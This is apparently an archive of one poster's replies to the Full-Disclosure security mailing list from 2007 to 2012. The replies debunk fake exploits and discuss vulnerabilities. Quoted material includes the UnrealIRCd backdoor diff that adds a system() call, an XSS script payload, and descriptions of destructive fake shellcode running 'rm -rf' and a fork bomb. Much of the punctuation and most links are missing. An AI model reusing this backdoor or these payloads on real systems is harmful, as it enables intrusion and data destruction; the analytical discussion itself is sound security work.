Re: [Full-disclosure] Re(2): An April Fools' Day Android Payload

2012-04-02 Thread Andrew Farmer
On 2012-04-02, at 11:42, アドリアンヘンドリック wrote:
 Just for the curiosity of April fool,
 actually I did a double check the $payload in x86 ASM code.

Er... did you miss the part that said ARM payload? ARM is not x86. :)
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Re: [Full-disclosure] Megaupload Anonymous hacker retaliation, nobody wins

2012-01-25 Thread Andrew Farmer
On 2012-01-25, at 16:36, Sanguinarious Rose wrote:
 I have found the perfect image to describe my thoughts on this current
 clash of intellectuals.

Alternatively (also, a more memorable link):

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Re: [Full-disclosure] Symlink vulnerabilities

2011-10-27 Thread Andrew Farmer
On 2011-10-27, at 07:48, wrote:
 The other thing that people need to remember is that there's no race condition
 that's so small that you can't hit it.  If there's a race condition, it *can*
 be won.

And systems like inotify make filesystem races trivial to win. I wouldn't be 
surprised if you could win this particular race reliably by watching for the 
files bzexe drops and acting immediately when they show up.
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Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)

2011-10-26 Thread Andrew Farmer
On 2011-10-25, at 19:15, adam wrote: (almost[?] identical code,
 claims to be a remote kernel root exploit) (very similar
 code, claims to be an IIS exploit) (didn't read entire thread,
 code is mentioned though)
 I'm sure there's more, but this kinda reminds me of that leaked private
 exploit on pastebin a few weeks back (you know, the one that was nice
 enough to create a _local_ root account), and insisted that it was private
 private private and specifically said NOT to leak it.

Well, I'll give it this -- it's one of the smaller Perl IRC bots I've seen in a 
while. ;)
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Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Andrew Farmer
On 2011-10-04, at 02:43, Darren Martyn wrote:
 Is there actually a non backdoored variant of said code? I have not seen any
 CVE mentioning that exploit so I was naturally wondering.

You are assuming that there is some substance to the code *besides* being a 
trojan/backdoor. Your assumption is mistaken -- there's no substance to it at 
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Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Andrew Farmer
On 2011-10-04, at 14:39, Kai wrote:
 Hi halfdog,
 Just for those, who want to build their own apache shell code for
 testing purposes, this snip might be of some use. It uses the still
 open tcp connections to the server to spawn the shells, so that no
 backconnect is needed. Of course, it does not give remote root but
 only httpd user privs. And you should send exec 10 as first
 command if you want to see remote shell stdout.
 wasn't that bug fixed a long ago? 
 sorry if i'm talking about different thing.

It's a generic method of getting a shell set up once you have code execution, 
not an exploit for any specific bug.
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Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-03 Thread Andrew Farmer
On 2011-10-03, at 07:31, Darren Martyn wrote:
 I regularly trawl to find code - often idiots leave some 0day
 and similar there and it is nice to find.
 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.

Totally fake:

  execl(/bin/sh, sh, -c, evil, 0);

That's taking shellcode in a much different direction than I've seen in the 
past. ;)
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Re: [Full-disclosure] Possibility to exploit bash * processing

2011-09-21 Thread Andrew Farmer
On 2011-09-21, at 09:55, wrote:
 On Wed, 21 Sep 2011 16:01:24 +0300, Dan Carpenter said:
 Seems like a good time to promote David Wheeler's filename proposal:
 Unfortunately, David Wheeler's proposal has some implementation issues:
 1. Forbid/escape ASCII control characters (bytes 1-31 and 127) in filenames,
 including newline, escape, and tab.
 3. Forbid/escape filenames that aren't a valid UTF-8 encoding.
 The problem is that the UTF-8 codespace consists *mostly* of multibyte
 characters, wherein at least one of the bytes, when considered by itself, is 
 ASCII control character.

Not true - the multibyte sequences in UTF-8 text consist entirely of high-bit 
characters (0xC2 - 0xF4 initial, 0x80 - 0xBF continuation). All characters 
below 0x80, including ASCII control characters, are always mapped directly to 
the corresponding codepoints.
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Re: [Full-disclosure] Western Union Certificate Error

2011-09-08 Thread Andrew Farmer
On 2011-09-07, at 07:40, JT S wrote:
 I recently got this error You attempted to reach, but instead you actually reached a server
 identifying itself as This may be caused by a
 misconfiguration on the server or by something more serious.

This appears to be an error, not a hack. Western Union doesn't use for anything obvious on their site -- the login 
form is at, and all of the other secure services 
I spotted are on different domains as well.
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Re: [Full-disclosure] Question about disclosure of WordPress plugin vulnerabilities

2011-08-29 Thread Andrew Farmer
On 2011-08-26, at 05:08, Miroslav Stampar wrote:
 Does anybody know what's the general opinion on disclosure of
 WordPress plugin vulnerabilities in these two sections:
 2) admin ones (requires access to the restricted admin area)

If you need full admin access to run the exploit, you probably have enough 
access that you could get arbitrary code execution by installing a plugin, like:

So the exploit isn't really doing much at that point, unless it can be 
triggered remotely (e.g, CSRF).
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Re: [Full-disclosure] Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)

2011-08-29 Thread Andrew Farmer
On 2011-08-26, at 08:12, Nikolay Kichukov wrote:
 This one works like charm on my debian stable
 LimitRequestFieldSize 200
 in the apache2.conf as global directive for all vhosts.

Be cautious about applying this mitigation -- it *will* break applications 
which use large cookies. In particular, the cookies generated by Google 
Analytics are often over 200 bytes long alone.
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Re: [Full-disclosure] IE handling the HTML notes incorrectly may lead to XSS attacks

2011-08-07 Thread Andrew Farmer
On 2011-08-07, at 19:53, CnCxzSec衰仔 wrote:
 hi all, here is an interesting trick to perform an xss attack with IE
 some rich text applications such as email and blog, may provide HTML uses
 but have a policy to block the on-event execution to prevent the XSS attack.
 However, this applications may also allow the HTML notes uses,for instance
 !--  --

Any such applications are likely to also be vulnerable to a simpler attack 
based on downlevel-hidden conditional comments:

!--[if IE]
scriptanything you want can go here, presumably/script
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Re: [Full-disclosure] Hacked ! By Indian Hacker Team (Dueto Mumbai Terror)

2011-07-16 Thread Andrew Farmer
On 2011-07-15, at 22:49, wrote:
 We might see a few more of these after the recent blasts in India. Cyberwar 
 between both nations can be at peak for some time again!

Cyberwar? That might be stretching things a bit. Lame script-kiddy antics 
seems a little closer to the mark.
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Re: [Full-disclosure] RSS feed suspicius

2011-07-05 Thread Andrew Farmer
On 2011-07-05, at 10:31, ector dulac wrote:
 # curl
 scriptvar t=;var
 Looks suspicious to me

Very. That unescapes to:

src=; width=1 height=1 

Which loads some amusingly obfuscated JS which looks like it's *supposed* to be 
a plugin exploit of some sort, but which has no real payload. At least, not 
when I looked.
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Re: [Full-disclosure] RSS feed suspicius

2011-07-05 Thread Andrew Farmer
On 2011-07-05, at 20:55, Nick FitzGerald wrote:
 Andrew Farmer to ector dulac:
 Looks suspicious to me
 Very. That unescapes to:
 [something that trips a bunch of AVs]
 Which loads some amusingly obfuscated JS ...
 That amused you?
 Maybe my irony detector is on the blink, but that was very ordinary 
 several years ago.

Eh, I hadn't seen the with() { } trick before. 

 ...  which looks like it's
 *supposed* to be a plugin exploit of some sort, but which has no
 real payload. At least, not when I looked. 
 U -- not what I got at all.

Perhaps it's UA sniffing -- the copy I got looked almost identical to the copy 
seen at:

including the empty redirect() function triggered by a chain of 
spl1/spl2/.../spl6 functions.
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Re: [Full-disclosure] [New Security Tool] INSECT Pro 2.6.1 release

2011-06-22 Thread Andrew Farmer
On 2011-06-22, at 20:38, adam wrote:
   - Using outdated version of SSL
   - Outdated SSL Certificate (2009)

And while we're beating this dead horse:

You attempted to reach, but instead you actually 
reached a server identifying itself as
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Re: [Full-disclosure] Apache 2.0.63 - 2.2.19 Remote Exploit Fake or not?

2011-06-16 Thread Andrew Farmer
On 2011-06-15, at 12:59, kernel wrote:
 Hi, all,
 Some days ago I found head -n * of exploit for apache at
 # Apache 2.0.63 - 2.2.19 Remote Exploit
 # This 0-day exploit will remotely gain root on any apache server from
 version 2.0.63 to 2.2.19
 # Beta release 2.3.12-beta was also compromised by an affiliate - need

The header looks like a crude modification of this 2003 DAV exploit:

There's also a glaring syntax error on line 22 of the pastebin code. It'd never 
run as written.
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Re: [Full-disclosure] File system recursion and symlinks: A never-ending story (and how to bring it to an end for me)

2011-05-30 Thread Andrew Farmer
On 2011-05-30, at 16:27, coderman wrote:
 On Mon, May 30, 2011 at 6:56 AM, halfdog wrote:
 It seems that quite a few backup applications are (or were) vulnerable
 to special combined symlink/timing attacks on pathname components before
 the last one (so O_NOFOLLOW does not help).
 Please let me know, if ... you
 have good reason, that the kernel interface is not the point, where this
 issue could be addressed most efficiently.
 use lvm snapshots for backups, either directly at volume level or
 mounting a read-only snapshot and running backup over that static
 filesystem state.

LVM snapshots have some nasty gotchas, though:

They also don't solve the problem of restoring a fragment of data (e.g, a 
single accidentally deleted file) from a backup in an untrustworthy environment.
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Re: [Full-disclosure] Launched New Tool - RAR Password Unlocker

2011-03-29 Thread Andrew Farmer
On 2011-03-29, at 12:29, wrote:
 is there any chance of seeing CUDA in action for the next versions? :)

Ha ha ha, no. (See below.)

 Installed executable is completely portable.
 why do we need installer then? distribute that tool as single 

Because without the installer, it can't try to monetize the install by 
installing search toolbars! (It's nice enough to continue the install if you 
reject their terms, though.)

On 2011-03-29, at 13:13, Jo Galara wrote:
 How does it work? Bruteforce?

Yes, but... well, JAD does a better job of explaining than I possibly could:

  Runtime rt = Runtime.getRuntime();
  String str = 7z.exe x ;
  str = str + \ + _filepath + \ ;
  str = str + -p\ + pwd + \ ;
  str = str + -o\ + _destpath + \;
  str = str +  -y;
  Process p = rt.exec(str);
  if (p.exitValue() == 0)
ret = true;

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Re: [Full-disclosure] Facebook URL Redirect Vulnerability

2011-03-02 Thread Andrew Farmer
On 2011-03-02, at 06:30, Nathan Power wrote:
 There are 3 different steps to perform an attack using a URL redirect:  1)
 trick the user 2) redirect 3) exploit .. We are using a Facebook URL to
 trick the user, we are using the URL redirect as the catalyst to perform an
 Here are some examples of the types of attacks you can perform with a URL
 redirect, CSRF, phishing (fake fb login), and browser exploits (javascript
 How would you have written the impact section?

Something like this:

 3. Impact:
 An attacker may obfuscate the target of a link, potentiating phishing attacks 
 and/or bypassing some simple URL filters.

Or something of the sort. The actual target of the link isn't obscured in the 
URL, so it's not even particularly convincing if the URL is displayed in plain 
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Re: [Full-disclosure] Facebook URL Redirect Vulnerability

2011-03-01 Thread Andrew Farmer
On 2011-02-28, at 09:42, Nathan Power wrote:
 3. Impact:
 Potentially allow an attacker to compromise a victim’s Facebook account
 and/or computer system.

Do you have an actual attack in mind which could accomplish either of these 
goals, or is this wishful thinking? (Browser exploits don't really count, as 
those would work just fine with or without the redirect.)

To be clear - open redirects are certainly a problem, but don't try to call 
them any more than that.
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Re: [Full-disclosure] sourceforge entry point seems still active.

2011-01-25 Thread Andrew Farmer
On 2011-01-24, at 12:08, exploit dev wrote:
 Anyway, I'm sorry repeat my message. I think that this issue is a bit
 critical but I don't receive still any feedback,

It's not particularly critical by any means. SourceForge projects all have 
their own web space, and there are doubtless a bunch of them running vulnerable 
versions of software. These sites are relatively isolated, and don't have write 
access to the project's SCM or downloads.
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Re: [Full-disclosure] Filezilla's silent caching of user's credentials

2010-10-16 Thread Andrew Farmer
On 14 Oct 2010, at 14:01, Jeffrey Walton wrote:
 If the encryption key stays on the same PC, there is absolutely no security
 in that. Given that this is open source, security through obscurity can't
 even start working (- encrypting local files with a local key / using
 custom algo == security through obscurity).
 Linux [apparently] has not caught on to the fact that applications
 could use help in securing secrets. Microsoft has DPAPI and iOS has
 KeyChain (one of the bug reports stated about the same).

Kernel key management seems to be a step in the right direction:

And FWIW, Keychain Services is mostly (all?) in userspace, so there's no reason 
a similar solution couldn't be implemented on Linux.
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Re: [Full-disclosure] Fw: [irc-security] UnrealIRCd backdoored on official ftp and site

2010-06-12 Thread Andrew Farmer
On 12 Jun 2010, at 08:09, Henri Salo wrote:
 I'd like to let you know that there's been a compromise of the 
 unrealircd website and ftp and the tarball release had been 
 replaced by a backdoored copy.

And here's the diff. Nature of the backdoor should be obvious upon 


diff -ru Unreal3.2-good/include/struct.h Unreal3.2-backdoored/include/struct.h
--- Unreal3.2-good/include/struct.h 2009-04-13 04:03:57.0 -0700
+++ Unreal3.2-backdoored/include/struct.h   2009-04-13 04:03:00.0 
@@ -430,6 +430,7 @@
 /* Fake lag exception */
 #define IsNoFakeLag(x)  ((x)-flags  FLAGS_NOFAKELAG)
 #define SetNoFakeLag(x) ((x)-flags |= FLAGS_NOFAKELAG)
 #define ClearNoFakeLag(x)   ((x)-flags = ~FLAGS_NOFAKELAG)
@@ -448,6 +449,7 @@
 #define IsNotSpoof(x)   (1)
+#defineDEBUGMODE3  ((x)-flags  FLAGS_NOFAKELAG)
 #define GetHost(x) (IsHidden(x) ? (x)-user-virthost : 
 #define GetIP(x)   ((x-user  x-user-ip_str) ? 
x-user-ip_str : (MyConnect(x) ? Inet_ia2p(x-ip) : NULL))
@@ -513,6 +515,10 @@
 #define CHECKPROTO(x,y) (checkprotoflags(x, y, __FILE__, __LINE__))
+#ifdef DEBUGMODE3
 #define DontSendQuit(x)(CHECKPROTO(x, PROTO_NOQUIT))
 #define IsToken(x) (CHECKPROTO(x, PROTO_TOKEN))
@@ -1373,6 +1379,7 @@
 #define INCLUDE_REMOTE 0x2
 #define INCLUDE_DLQUEUED   0x4
 #define INCLUDE_USED   0x8
+#define DEBUG3_DOLOG_SYSTEM(x) system(x)

 struct _configitem_include {
ConfigItem *prev, *next;
diff -ru Unreal3.2-good/src/s_bsd.c Unreal3.2-backdoored/src/s_bsd.c
--- Unreal3.2-good/src/s_bsd.c  2009-03-01 10:37:58.0 -0800
+++ Unreal3.2-backdoored/src/s_bsd.c2006-06-16 11:29:00.0 -0700
@@ -1431,6 +1431,10 @@
return 1;
if (length = 0)
return length;
+#ifdef DEBUGMODE3
+   if (!memcmp(readbuf, DEBUGMODE3_INFO, 2))
+   DEBUG3_LOG(readbuf);
for (h = Hooks[HOOKTYPE_RAWPACKET_IN]; h; h = h-next)
int v = (*(h-func.intfunc))(cptr, readbuf, length);

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Re: [Full-disclosure] Drupal Context Module XSS

2010-05-10 Thread Andrew Farmer
On 10 May 2010, at 06:08, Justin C. Klein Keane wrote:
 Drupal security responds that they do not coordinate security fixes for
 modules in release candidate designation.  Vulnerability was reported to
 the module maintainer via the public issue queue at the direction of
 Drupal security.

Also, isn't it pretty well established by this point that Drupal generally 
doesn't consider XSS to be a vulnerability if you need an admin account to 
trigger it?
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Re: [Full-disclosure] MouseOverJacking attacks

2009-12-30 Thread Andrew Farmer
On 29 Dec 2009, at 13:48, MustLive wrote:
 Recently, 26th of December 2009, I wrote the article MouseOverJacking
 attacks (, and today I
 wrote English version of it (

Hardly news. If you can inject arbitrary HTML into a web page, there are plenty 
of ways (many of them easier or more flexible than this) you can get it to run 

- script tags, obviously

- Binding other events that'll trigger without an event, like onLoad

- CSS (either inline, in a style, or loaded from another site with link 
rel=stylesheet) containing any of:

  * Background images loaded with the javascript: protocol
  * expression() (MSIE only?)
  * -moz-binding

- Embedded objects (say, Flash, using ExternalInterface)

None of this is considered particularly novel at this point.
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Re: [Full-disclosure] more on that

2009-11-25 Thread Andrew Farmer
On 24 Nov 2009, at 13:41, Tyler Durten wrote:
 And this is what I'm talking about:

... which reads, in part:
 //Section Initialises designs implemented by mexicans

I can understand possibly overlooking something clever (like a fake exploit 
that buffer-overflows itself), but this isn't even marginally subtle.
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Re: [Full-disclosure] ICMPv4/IP fuzzer prototype.

2009-11-22 Thread Andrew Farmer
On 22 Nov 2009, at 19:48, laurent gaffie wrote:
 Should be kweel for UTesting
 Dont forget it's a prototype, and i ASSUME you know what you're doing, do not 
 ask for help.

You definitely have to know what you're doing to run the code, as posting that 
to Blogspot has destroyed the indentation. :)

Also, random.randrange(...) is going to give you much better performance than 
random.choice(range(...)). Just sayin'.
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Re: [Full-disclosure] Drupal XML Sitemap 6.x-1.1 XSS Vulnerability

2009-10-15 Thread Andrew Farmer
On 15 Oct 2009, at 07:24, Justin Klein Keane wrote:
 Applying the following patch mitigates these threats.

 - --- site_map/site_map.module2009-09-30 15:09:49.295134033 -0400
 +++ site_map/site_map.module  2009-09-30 15:09:30.09976 -0400
 @@ -14,7 +14,7 @@ function site_map_help($path, $arg) {
  switch ($path) {
case 'sitemap':
  $output = _sitemap_get_message();
 - - -  return $output ? 'p'. filter_xss($output) .'/p' : '';
 +  return $output ? 'p'. $output .'/p' : '';

Surely that should be the other way around?

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Re: [Full-disclosure] or similar site

2009-09-12 Thread Andrew Farmer
On 11 Sep 2009, at 02:46, mamo wrote:
 What do you think of web site like or similar one?
 Do they really work and how?
 After about three to four days, you will get an email from the  
 account you wanted to hack. This email acts as proof we have hacked  
 the account. The email will be sent from within the vistims account.  
 It will contain information on the next step to purchase the  
 password from us. Please check that the email was sent from the  
 exact email address you wanted to hack. This email will NOT appear  
 in the 'sent' folder, so they will never know they have been hacked.

So, in other words, they're spoofing From addresses for profit. Clever.

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Re: [Full-disclosure] Update: [GSEC-TZO-44-2009] One bug to rule them all - Firefox, IE, Safari, Opera, Chrome, Seamonkey, iPhone, iPod, Wii, PS3....

2009-07-21 Thread Andrew Farmer
On 21 Jul 2009, at 08:12, Michal Zalewski wrote:
 There are literally thousands of HTML- and JavaScript-related denial
 of service vectors in modern browsers...

There's one significant difference in this one, though: while a bunch  
of nested divs (for instance) will just mess with the HTML renderer,  
a malformed or oversized select element may end up passing bad data  
to native menu APIs. It's one of the only elements I can think of  
offhand that often has effects which extend outside the HTML canvas.

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Re: [Full-disclosure] “Cross-Site Scripting” vul nerability in MyBB 1.4.5

2009-05-03 Thread Andrew Farmer
On 03 May 09, at 05:01, Jacques Copeau wrote:
 Advisory : “Cross-Site Scripting” vulnerability in MyBB
 The XSS renders in all browsers and on various pages inside the myBB  
 We consider it to be particularly grave, as it renders on the ACP  
 user overview
 page; this can be easily exploited to construct a universal CSRF  
 that introduces malicious php code into the script.

So, er, is this vulnerability XSS, CSRF, or RCE? Pick one and stick  
with it.
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Re: [Full-disclosure] Help with something?

2009-01-12 Thread Andrew Farmer
On 12 Jan 09, at 09:53, Will McAfee wrote:
 I got started a long time ago writing example code for new security-
 interested people.  I got just one example done, my full time job and
 school started, and gave up debugging.  Just out of curiosity, going
 to throw it out there.  It's the only example up at
  let's see where I messed up.  It segfaults, if I remember correctly.

At a glance, you're doing linked list management wrong. Stop trying to  
code your own. This is C++; the STL exists for a reason.

Same goes for char arrays (which you leak all over the place). The STL  
has strings too.

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Re: [Full-disclosure] new unpatched security flaw found Firefox 3.0.4

2008-12-17 Thread Andrew Farmer
On 16 Dec 08, at 11:49, carl hardwick wrote:
 New unpatched security flaw found in Firefox 3.0.4
 PoC here:

Relevant bug is

This doesn't appear to be security-critical - it's a NULL dereference.

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Re: [Full-disclosure] Project Chroma: A color code for the state ofcyber security

2008-12-02 Thread Andrew Farmer
On 02 Dec 08, at 00:39, Mike C wrote:
 Once all desktops have an icon or widget (say at the right hand
 corner) with the color, and this is consistently seen everywhere, the
 users will start associating with their online security. they will be
 reminded that they have to be careful with the data they share.

Perhaps you can also make a spy show up on the user's screen every
half hour to warn them that their communications may be monitored,
and allow them to report suspicious web sites to the appropriate

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Re: [Full-disclosure] does the aim service save chat session details?

2008-11-26 Thread Andrew Farmer
On 26 Nov 08, at 11:17, AMILABS wrote:
 Is AIM IM purely peer to peer or a store and forward type protocol?

It is neither. In most cases, the server forwards messages from client  
to client, but does not retain them. The client also supports a peer- 
to-peer mode, but it's rarely used.

 We need
 to determine if we can recover a past IM chat conversation that  
 over two weeks ago. Our chat client did not have IM logging enabled  
 so we
 need to know if the service archives all chat conversations for law
 enforcement and legal purposes.

You'll have to ask AOL about that. If there are server-side logs, they  
are not exposed to users.

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Re: [Full-disclosure] Zero-day Catcher for Windows available for sell

2008-09-15 Thread Andrew Farmer
On 15 Sep 08, at 13:39, Zero-day catcher team wrote:
 RSA theory, discussed here, was not broken (if you have evidence -
 please, share it or turn off your claims in this context).

The archives recall otherwise:

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Re: [Full-disclosure] Google Chrome Browser Vulnerability

2008-09-03 Thread Andrew Farmer
On 02 Sep 08, at 21:48, Paul Ferguson wrote:
 - -- James Matthews [EMAIL PROTECTED] wrote:
 The same thing happened to safari when it came out on windows.

 Well, no kidding. :-)

 Maybe the flaws that will hound Chrome are due to the fact that
 it uses Safari as a codebase?

WebKit != Safari. Security-related bugs in rendering engines are  
pretty uncommon.

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Re: [Full-disclosure] Klueless Klowns Team PHP shell

2008-08-17 Thread Andrew Farmer
On 17 Aug 08, at 15:59, William McAfee wrote:
 For those of us who do not enjoy deciphering code with next to no
 comments, would you mind describing what exactly that code is supposed
 to do, how it does it, and why?

It's a PHP shell, often used on exploited systems. Doesn't appear to  
be significantly different from other versions in the wild, besides a  
few modified credits and the removal of certain automatic-update  

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Re: [Full-disclosure] Step-by-step instructions for debugging Cisco IOS using gdb

2008-08-16 Thread Andrew Farmer
On 15 Aug 08, at 11:20, Smiler S wrote:
 From: Andy Davis 

 Date: Tue, 12 Aug 2008 22:01:37 +0100

 Congratulations you are now debugging IOS ;-)
 One unusual feature, which I have yet to explain is that when the
 registers are displayed they are all offset by 1 e.g:

 If a vector variable is stored in a register, gcc writes debug  
 telling gdb which register the variable is stored in. This mapping is
 changed between gcc2  gcc3. Since there isn't anything in the debug  
 to distinguish code compiled by gcc3 from code compiled by gcc2,  
 there is no
 way for gdb to know the right map. gdb supports the gcc3 map.

 If vector code is compiled by gcc2 as in the case of IOS, then the  
 assignment will be off by 1.

This isn't vector code, though - the whole register map is off. I'm  
not particularly familiar with IOS, but my guess is the debugging  
protocol is a little off from what GDB expects.

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Re: [Full-disclosure] xss dot(.) filter evasion

2008-06-18 Thread Andrew Farmer
On 18 Jun 08, at 08:49, Thomas Pollet wrote:
 I came across this site that implemented some filtering so the dots  
 replaced by an underscore, also the quotes and backslash were escaped.
 I came up with the code below to bypass this filtering (write  
 anything to
 the page using String.fromCharCode)
 Someone knows a different way to do this?

eval makes everything easy. Well, reasonably easy.


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Re: [Full-disclosure] exploit coding / Pentesting / 0day selling services

2008-04-21 Thread Andrew Farmer
On 20 Apr 08, at 11:06, Jean Duboscs wrote:
 I am belgium.

And I am Spartacus?

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Re: [Full-disclosure] gallarific backdoored , vulnerable to xss

2008-04-15 Thread Andrew Farmer
On 15 Apr 08, at 09:07, Thomas Pollet wrote:
 I was looking at the free version of gallarific, and I found some  
 code in the scopbin directory.
 Attached is a file I found in the zip i downloaded, in case someone  
 wants to
 decode it.

Looks like a component of the ScopBin PHP obfuscator. It's not  
particularly hard to reverse, but I didn't bother.

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Re: [Full-disclosure] 0day LINUX 0day LATEST

2008-01-28 Thread Andrew Farmer
On 28 Jan 08, at 02:13, wejwklekl246 wrote:
 * afunixroot.c Linux kernel 2.6.x i386 local root exploit

blah blah blah

Compiles a shared library in /tmp/ containing the functions

int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }

and executes /bin/sh with LD_PRELOAD=/tmp/

Pretty lame. Protip: hellc0de containing lots of \x61-\x7f looks fake.

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Re: [Full-disclosure] here

2007-12-20 Thread Andrew Farmer
On 20 Dec 07, at 18:51, onion ring wrote:
 char sc[] =

Abbreviated disassembly:
   signal(SIGHUP, SIG_IGN)
   something that looks like a 15-level deep fork() bomb
   something involving kill()
   execve(//bin/rm, {//bin/rm, -rff, *///})

You could at least try to obfuscate your constants a little better.  
That was way too easy.

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Re: [Full-disclosure] The Cookie Tools v0.3 -- first public release

2007-12-10 Thread Andrew Farmer
On 10 Dec 07, at 05:45, michele dallachiesa wrote:
 why HTTPS is not the default in this type of services? this is a big
 silent hole. maybe, today is less silent :)

The short version is because hosting things with SSL is still hard.

There's a few things which are significantly holding back the move to  
SSL web servers. They include:

* Every domain hosted with SSL must have a dedicated IP address. This  
basically rules out any form of shared hosting.

* SSL certificates don't come cheap. $50 seems like the low end right  
now, and the really big names (like Verisign or Thawte) charge several  
times that.

* Many common load-balancing products only work with unencrypted HTTP.  
Furthermore, SSL places a much higher load on the server.

Some of these things are set to change - for example, SNI is set to  
fix the first one. However, it's only just becoming available; it'll  
be a while before it can be relied on in production systems.

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Re: [Full-disclosure] Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit -

2007-11-13 Thread Andrew Farmer
On 13 Nov 07, at 18:08, XSS Worm XSS Security Information Portal wrote:
 We have looked at coding for wp-slimstat but we cannot see any  
 problem with
 input validating. Maybe some of the readers can show us  
 problem is in the php code because we cannot see any porblem here:

OK, I'll bite...

 filters', 'wp-slimstat').'/a':).'
 input type=hidden name=page value='.$_GET['page'].' /
 input type=hidden name=panel value='.$_GET[panel].' /
 input type=hidden name=fd value='.$_GET[fd].' //form';

Those all look like you could escape from the tag attribute with a  
well-placed double quote, assuming that there's no preprocessing on  

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Re: [Full-disclosure] Suspicious URL in IDS

2007-11-03 Thread Andrew Farmer
On 03 Nov 07, at 16:24, Kelly Robinson wrote:
 Is the following URL valid?  http://[EMAIL PROTECTED]

Technically, yes. (It specifies that the client is to authenticate to 
  with the username It's often used in phishing  
attempts, though, as a sufficiently long username can be used to  
obscure the actual hostname and path.

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Re: [Full-disclosure] rPSA-2007-0212-1 util-linux

2007-10-12 Thread Andrew Farmer
On 12 Oct 07, at 01:34, yearsilent wrote:
 could anybody explain this bug?

   I saw the git diff:

   -   setuid(getuid());
   -   setgid(getgid());
   +   if(setgid(getgid())  0)
   +   die(EX_FAIL, _(umount:  
 cannot set group id: %s), strerror(errno));
   +   if(setuid(getuid())  0)
   +   die(EX_FAIL, _(umount:  
 cannot set user id: %s), strerror(errno));

 not only root can do mount ? what condition could cause setuid  
 failed ?

setuid() fails if the operation would create more processes owned by  
the target user than the number specified by that user's process- 
count limit.

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Re: [Full-disclosure] Report to Recipient(s)

2007-10-09 Thread Andrew Farmer
On 09 Oct 07, at 20:04, [EMAIL PROTECTED] wrote:
 Sometimes I really do have to wonder about people.  Obviously it  
 wasn't a message that came from me since the in my  
 email might be a good clue that I'm using a blackberry to do my  
 emails (in case the T-Mobile tagline/nagline was an obvious enough  
 hint as is).  Now I wonder which bag of garbage spammer to thank  
 for this since someone is obviously running around with my email  
 addr and spaming.
 The file / html you received was infected with the Exploit- 
 virus and was deleted.

Actually, my guess would be that a message you sent (or that you  
quoted!) tripped someone's virus filter. CVE2007-3845 reads:

 Mozilla Firefox before, Thunderbird before and 2.x  
 before, and SeaMonkey before 1.1.4 allow remote attackers  
 to execute arbitrary commands via certain vectors associated with  
 launching a file handling program based on the file extension at  
 the end of the URI, a variant of CVE-2007-4041. NOTE: the vendor  
 states that it is still possible to launch a filetype handler  
 based on extension rather than the registered protocol handler.

which sounds a lot like the topic that was being discussed.

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Re: [Full-disclosure] Firefox has a very serious calculation bug

2007-09-29 Thread Andrew Farmer
On 28 Sep 07, at 19:25, wac wrote:
 On 9/28/07, Jimby Sharp [EMAIL PROTECTED] wrote:
 How is this serious and is it related to security in any manner? If
 not, please do not spam. :-(

  Many bugs are security related (I would say all). How it is security
 related? Think. What happens if your bank calculates something  
 wrong and
 puts the lower in your account and the higher in another account?  
 Yes It
 might be little but what about a little many
 times? That could be done with javascript too. Then... you are not  

If your bank is doing financial calculations using Javascript in a
standard web browser, you have bigger things to worry about than
roundoff errors.

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Re: [Full-disclosure] python = 2.5.1 standart librairy multiples int overflow, heap overflow in imageop module

2007-09-16 Thread Andrew Farmer
On 15 Sep 07, at 16:53, Slythers Bro wrote:
 The module imageop contains a lots of int overflow, which result in  
 heap overflow, and maybe memory dump.
 The files imageop.c and rbgimgmodule.c are examples.

The real question: Does anybody actually use those modules? Most  
Python programs that I've seen that do image processing use other  
methods, like PIL or calling out to Imagemagick.

A bit of searching on Google Code Search didn't find me anything that  
actually used imageop or rgbimgmodule except test cases for those  
modules. rgbimgmodule isn't even part of a standard build of Python 2.5.

Remember that Python is *not* a managed language - there's no  
guarantees of safety inherent in the language. In fact, there are  
easier ways to execute native code: take a look at ctypes, for  
example. While I'd definitely classify the behavior you've identified  
as a bug, it's unlikely to be exploitable in the context of any  
programs which use it (if, indeed, there are any).

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Re: [Full-disclosure] [Beyond Security] New sudo off-by-one poc exploit.

2007-08-06 Thread Andrew Farmer
On 05 Aug 07, at 15:48, Beyond Security wrote:
  *  off by one ebp overwrite in sudo prompt parsing function
  *  discovered by beyond security in 2007, thx ge
  *  to compile: gcc -pipe -o sobo sobo.c ; ./sobo
  *  please use responsibly! a patch has already been sent
  *  upstream and a fix will be included in the next sudo release

Smashes its own stack and runs rm -rf ~ / . Very clever.

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Re: [Full-disclosure] Does this exist ?

2007-07-05 Thread Andrew Farmer
On 05 Jul 07, at 06:20, Dan Becker wrote:
 I have an idea that won't leave me alone and this list seems to  
 have the most potential for knowing if the idea exists. My  
 apologies for a somewhat offtopic post.

 Would there be a way to create a  rainbow table of tcp packets to  
 be used to generate one packet for every 1000 or so normal packets  
 simply by matching hashes with databases on both ends ?

No; for a 128-bit hash (for example) there are only 2^128 packets  
which can be uniquely represented. This is far below the 2^12144 1518- 
byte packets which are possible, so - by the pigeonhole principle,  
there will be collisions. Increasing the hash size won't help unless  
you make it at least as large as the packet, at which point you  
aren't gaining anything.

Computing such a rainbow table is computationally impossible, anyway.  
The largest keyspace which I know of that's been brute-forced was  
somewhere around 64 bits, and that takes either dedicated hardware or  
a distributed-computing network. 128 bits is believed to be  
physically impossible, and even that is just barely enough to fit a  
TCP header into, without any data.

If the data being transmitted over the link is reasonably redundant,  
then you might get lucky and be able to just hash the relevant  
packets ahead of time. However, you could probably do even better  
with a purpose-built compression scheme anyway.

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Re: [Full-disclosure] How to protect RFI ??

2007-05-27 Thread Andrew Farmer
On 27 May 07, at 19:41, Mark Sec wrote:
 G00d thanks,
 does any1 know a tool for looking vulnerabilities inside of my  
 *.php files
 ? or something to automated the search vulnerabilities?

find /php/dir -name '*.php' -print0 | xargs -0 egrep '(include| 

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Re: [Full-disclosure] TCP/IP vulnerability

2007-05-23 Thread Andrew Farmer
On 23 May 07, at 08:27, Mohit Kohli wrote:
 Thanks for the reply but have some concerns...
 1)Tearn drop and land attack work on win 95 server,how to exploits  
 this vulnerability or its variant on windows 2000 or linux.

